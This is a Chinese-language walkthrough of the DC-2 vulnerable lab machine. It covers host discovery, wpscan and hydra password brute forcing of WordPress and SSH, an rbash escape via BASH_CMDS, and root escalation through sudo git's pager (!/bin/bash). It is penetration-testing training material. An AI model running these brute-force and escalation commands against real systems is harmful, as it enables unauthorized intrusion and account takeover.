[渗透实战]:渗透测试实战-DC-2-靶机入侵
[渗透实战]:渗透测试实战-DC-2-靶机入侵
DC-2 靶机实战
靶机资源下载:
我的百度网盘
启动DC-2

配置其网络为NAT,查看其Mac 地址,重启DC-2 使其网路配置生效

使用nmap 扫描内网网段

得到DC-2 的IP地址192.168.1.162
对其进行信息收集

访问其IP ,连接失败

添加本地DNS解析
vim /etc/hosts

再访问该网站,解析成功

flag1

cewl 工具
cewl dc-2 >pwd.dic
网站目录扫描
使用MSF 进行网站目录扫描
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.162
set THREADS 50
exploit

wpscan工具
wpscan --update
apt-get install wpscan wpscan 更新
注:如果wpscan 无法使用,可以尝试更换新的kali 虚拟机,笔者就碰到类似的问题,安装 kali 2020.2 之后,wpscan 启动成功
附清华大学开源镜像站kali2020.2(amd64,installer)下载链接
https://mirrors.tuna.tsinghua.edu.cn/kali-images/current/kali-linux-2020.2-installer-amd64.iso
wpscan --url dc-2 -e u

wpscan 爆破用户
wpscan --url dc-2 -U user.dic -P pwd.dic

flag2
192.168.1.162/wp-admin

使用jerry用户并用我们爆破出来的密码尝试登录

找到flag2

他告诉我们需要另辟蹊径,我们想到了刚开始使用nmap 扫描时,还扫出了ssh 端口7744
hydra 爆破ssh
hydra -L user.dic -P pwd.dic ssh://192.168.1.162 -s 7744 -o hydra.ssh -vV
查看结果:

尝试使用ssh 登录
ssh tom@192.168.1.162 -p 7744
查看当前目录文件
ls
cat flag3.txt
发现有rbash 命令限制

flag3
绕过限制
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

flag4
切换用户
切换jerry用户
su jerry
输入密码,登录成功

我们进入到jerry 用户的家目录

执行命令,发现没有权限
final-flag
提权
查看具有root权限的命令
sudo -l
发现git 命令具有root 权限,但是不需要提供给root 密码

git 提权
sudo git -p --help
强制进入交互式状态,让页面缓冲区无法显示全部信息
!/bin/bash


浙公网安备 33010602011771号